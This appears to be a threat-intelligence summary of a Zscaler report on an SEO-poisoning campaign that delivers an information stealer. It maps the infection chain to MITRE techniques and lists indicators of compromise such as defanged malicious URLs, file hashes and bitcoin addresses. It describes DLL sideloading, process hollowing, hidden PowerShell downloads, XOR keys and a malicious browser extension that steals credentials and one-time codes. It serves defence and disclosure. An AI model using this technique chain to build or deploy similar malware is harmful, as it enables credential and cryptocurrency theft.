Black Hat SEO Leveraged to Distribute Malware

Zscaler researchers uncovered a campaign where threat actors used Black Hat SEO (SEO poisoning) to promote fraudulent pages on legitimate hosting platforms and deliver multi-stage information stealer payloads via obfuscated JavaScript, nested ZIPs, DLL sideloading, process hollowing, and PowerShell-based downloads. The infection culminates in a malicious browser extension that contacts C2 servers (discovered via a Bitcoin-address lookup) and exfiltrates browser data, credentials, and targeted email content related to crypto exchanges. #JS_Trojan_Agent #libgcrypt_20_dll

Keypoints

Threat actors create fraudulent sites on popular hosting/blogging platforms and use SEO poisoning to push those sites into search results, increasing drive-by victimization.
Sites check the HTTP referrer and only redirect/search-driven visitors to the next stage, using heavy JavaScript obfuscation to evade analysis.
Payload delivery uses a two-level ZIP (inner ZIP password hidden in an image) to hide the malicious installer from automated inspection.
The installer drops a malicious DLL (libgcrypt-20.dll) alongside a genuine GPG binary and relies on DLL sideloading and process hollowing to execute the payload within explorer.exe.
Explorer.exe is used to launch PowerShell with a hidden command-line that downloads a multi-layer obfuscated Base64 payload which is then XOR-decoded and deobfuscated to produce malicious JavaScript files and extension components.
A malicious browser extension is installed (via a created Chrome shortcut using –load-extension) that contacts C2 (C2 location retrieved via blockchain.info lookup), harvests browser cookies/credentials/fingerprints, and injects/modifies webmail to capture OTPs and crypto-related emails.
Network artefacts include multiple malicious domains and download URLs used to fetch DLLs and BIN files; Zscaler mapped several file hashes and hundreds of scam Weebly sites tied to the campaign.

MITRE Techniques

[T1566] Phishing – SEO poisoning used to manipulate search results and lure victims: [‘Threat actors intentionally create these sites to spread malware by using the proliferation of web hosting platforms to manipulate search engine results’]
[T1027] Obfuscated Files or Information – Heavy JavaScript and multilayer Base64/XOR obfuscation to hide redirection and payload logic: [‘This obfuscation method employs string concatenation and mathematical manipulation to hide the code’s logic.’]
[T1055] Process Injection (Process Hollowing) – Attacker creates a suspended explorer.exe, unmaps and replaces its memory, writes payload, and resumes thread to run injected code: [‘it triggers the execution of explorer.exe and utilizes process hollowing techniques.’]
[T1574] Hijack Execution Flow (DLL Side-loading) – Malicious DLL dropped alongside legitimate GPG installer and loaded via DLL sideloading (libgcrypt-20.dll): [‘malicious DLL libgcrypt-20.dll loaded using DLL sideloading.’]
[T1059.001] Command and Scripting Interpreter: PowerShell – Hidden PowerShell invocation downloads and decodes obfuscated script (special-character replacement, Base64, XOR): [‘PowerShell executable, passing along a malicious command-line argument, -windowstyle hidden’]
[T1105] Ingress Tool Transfer – Downloader components fetch additional DLL/BIN files and scripts from remote domains (aprel88[.]com, t9z[.]lol, 1blob[.]monster): [‘download a malicious DLL from t9z[.]lol/imvLbzv05W’]

Indicators of Compromise

[Domain/URL] Downloader/C2 endpoints – aprel88[.]com/getLicenseInfo.php?requirements=time&checkMethod=2, t9z[.]lol/imvLbzv05W, and other domains like 1blob[.]monster/pidaras/142.bin
[Domain] Extension/file hosting domains – good2-led[.]com/dark4.bs64, dark-confusion[.]com (C2 resolved via blockchain lookup)
[File hashes] Sample payload hashes – 26B980E5A79883830EBE9E588867F9A7, E0B000BD86ACE23AB5D94FC44480D8B3, and 2ECE1BB679CB143D84BBA1F114288101
[File names] Installer and malicious DLL – setup.exe (malicious installer that also installs GPG) and libgcrypt-20.dll (malicious sideloaded DLL)
[Scam sites] Weebly-hosted fraudulent pages – goodclassic.weebly.com, entrancementace.weebly.com, and many more scam weebly subdomains used to host fake MediaFire pages (dozens listed)
[Blockchain/Bitcoin addresses] C2 discovery via blockchain lookup – bc1qnxwt7sr3rqatd6efjyym3nsgxhslyzeqndhjpn (queried), 1A9mJv7MHkSzMqe4TEdfyttEz9ZcZugyLR (returned/address used to derive dark-confusion[.]com)

Threat actors hosted SEO-poisoned pages on legitimate blogging platforms and used referrer checks to only serve malicious content to search-engine-referred visitors. The landing page contained heavily obfuscated JavaScript that, after deobfuscation, redirected victims to a fake MediaFire-style download page. The delivered payload was packaged as a nested ZIP (inner ZIP password embedded in an image), so manual extraction was required to reach the installer.

Running the supplied setup.exe installs the legitimate GPG binary while dropping a malicious DLL (libgcrypt-20.dll) into the same folder; the malware relies on DLL sideloading to execute. The DLL then spawns a suspended explorer.exe and performs process hollowing via undocumented APIs (CreateProcessInternalA, NtUnmapViewOfSection, VirtualAllocEx, WriteProcessMemory, ResumeThread) to run an injected payload. That payload launches PowerShell with a hidden window and a command-line that fetches a Base64-encoded, specially character-replaced payload; the data is decoded (FromBase64String) and XOR-deobfuscated (keys 167 and 18) to reveal additional scripts.

Post-deobfuscation, PowerShell drops multiple JavaScript files that install a malicious Chrome extension (a desktop shortcut points Chrome at –load-extension=). The extension contacts C2 (C2 location obtained by decoding a Base58 string retrieved from blockchain.info address lookups), exfiltrates system/browser data (cookies, credentials, fingerprints), and injects/modifies webmail content (gmail.js/main.js) to intercept withdrawal emails and six-digit authentication codes for targeted crypto exchanges.